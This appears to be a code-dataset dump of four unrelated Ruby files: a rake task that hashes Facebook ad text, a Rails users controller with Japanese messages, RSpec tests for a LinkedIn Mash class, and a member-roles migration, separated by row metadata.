# eventually this'll be done by the ad catcher, with ATI (but for "collector ads", obvi)
# writable_ad should be created for EVERY new ad.
counter = 0
start = Time.now
batch_size = 500
FbpacAd.left_outer_joins(:writable_ad).where(writable_ads: {ad_id: nil}).find_in_batches(batch_size: batch_size).each do |new_ads|
counter += 1
puts batch_size * counter
new_ads.each(&:create_writable_ad!)
end
WritableAd.where("text_hash is null and ad_id is not null").find_in_batches(batch_size: batch_size).each do |ads_without_text_hash|
ads_without_text_hash.each do |wad|
wad.text_hash = Digest::SHA1.hexdigest(wad.fbpac_ad.clean_text)
wad.ad_text = create_ad_text!(wad)
wad.save!
end
end
job = Job.find_by(name: "text:fbpac_ads")
job_run = job.job_runs.create({
start_time: start,
end_time: Time.now,
success: true,
})
# RestClient.post(
# ENV["SLACKWH"],
# JSON.dump({"text" => "(3/6): text hashing for collector ads went swimmingly. (#{counter} batches processed)" }),
# {:content_type => "application/json"}
# ) if ENV["SLACKWH"]
end
end
| 47.813559 | 213 | 0.688231 |
ac1898b14035803ede5275be0e45de443670db8f | 1,501 | class UsersController < ApplicationController
before_action :logged_in_user, only: [:index, :edit, :update, :destroy]
before_action :correct_user, only: [:edit, :update]
before_action :admin_user, only: :destroy
def index
@users = User.where(activated: true).paginate(page: params[:page])
end
def show
@user = User.find(params[:id])
redirect_to root_url and return unless @user.activated?
end
def new
@user = User.new
end
def create
@user = User.new(user_params)
if @user.save
@user.send_activation_email
flash[:info] = "アカウント有効化のメールを送信しました"
redirect_to root_url
else
render 'new'
end
end
def edit
end
def update
if @user.update_attributes(user_params)
flash[:success] = "プロフィールが更新されました"
redirect_to @user
else
render 'edit'
end
end
def destroy
User.find(params[:id]).destroy
flash[:success] = "ユーザーを削除しました"
redirect_to users_url
end
private
def user_params
params.require(:user).permit(:name, :email, :password, :password_confirmation)
end
#beforeアクション
#ログイン済みユーザーか確認
def logged_in_user
unless logged_in?
store_location
flash[:danger] = "ログインしてください"
redirect_to login_url
end
end
def correct_user
@user = User.find(params[:id])
redirect_to(root_url) unless current_user?(@user)
end
def admin_user
redirect_to(root_url) unless current_user.admin?
end
end
| 20.561644 | 84 | 0.660227 |
08021e39841a2e2bcf7a1b9244dd003f97d99755 | 2,927 | require 'helper'
describe LinkedIn::Mash do
describe ".from_json" do
it "should convert a json string to a Mash" do
json_string = "{\"name\":\"Josh Kalderimis\"}"
mash = LinkedIn::Mash.from_json(json_string)
mash.should have_key('name')
mash.name.should == 'Josh Kalderimis'
end
end
describe "#convert_keys" do
let(:mash) do
LinkedIn::Mash.new({
'firstName' => 'Josh',
'LastName' => 'Kalderimis',
'_key' => 1234,
'id' => 1345,
'_total' => 1234,
'values' => {},
'numResults' => 'total_results'
})
end
it "should convert camal cased hash keys to underscores" do
mash.should have_key('first_name')
mash.should have_key('last_name')
end
# this breaks data coming back from linkedIn
it "converts _key to id if there is an id column" do
mash._key.should == 1234
mash.id.should == 1345
end
context 'no collision' do
let(:mash) {
LinkedIn::Mash.new({
'_key' => 1234
})
}
it 'converts _key to id if there is no collision' do
mash.id.should == 1234
mash._key.should == 1234
end
end
it "should convert the key _total to total" do
mash.should have_key('total')
end
it "should convert the key values to all" do
mash.should have_key('all')
end
it "should convert the key numResults to total_results" do
mash.should have_key('total_results')
end
end
describe '#timestamp' do
it "should return a valid Time if a key of timestamp exists and the value is an int" do
time_mash = LinkedIn::Mash.new({ 'timestamp' => 1297083249 })
time_mash.timestamp.should be_a_kind_of(Time)
time_mash.timestamp.to_i.should == 1297083249
end
it "should return a valid Time if a key of timestamp exists and the value is an int which is greater than 9999999999" do
time_mash = LinkedIn::Mash.new({ 'timestamp' => 1297083249 * 1000 })
time_mash.timestamp.should be_a_kind_of(Time)
time_mash.timestamp.to_i.should == 1297083249
end
it "should not try to convert to a Time object if the value isn't an Integer" do
time_mash = LinkedIn::Mash.new({ 'timestamp' => 'Foo' })
time_mash.timestamp.class.should be String
end
end
describe "#to_date" do
let(:date_mash) do
LinkedIn::Mash.new({
'year' => 2010,
'month' => 06,
'day' => 23
})
end
it "should return a valid Date if the keys year, month, day all exist" do
date_mash.to_date.should == Date.civil(2010, 06, 23)
end
end
describe "#all" do
let(:all_mash) do
LinkedIn::Mash.new({
:values => nil
})
end
it "should return an empty array if values is nil due to no results being found for a query" do
all_mash.all.should == []
end
end
end
| 25.675439 | 124 | 0.611889 |
285d7e51a2d401a79051444d09cef0c8936d6029 | 269 | class PopulateMemberRoles < ActiveRecord::Migration
def self.up
MemberRole.delete_all
Member.all.each do |member|
MemberRole.create!(:member_id => member.id, :role_id => member.role_id)
end
end
def self.down
MemberRole.delete_all
end
end
| 20.692308 | 77 | 0.710037 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.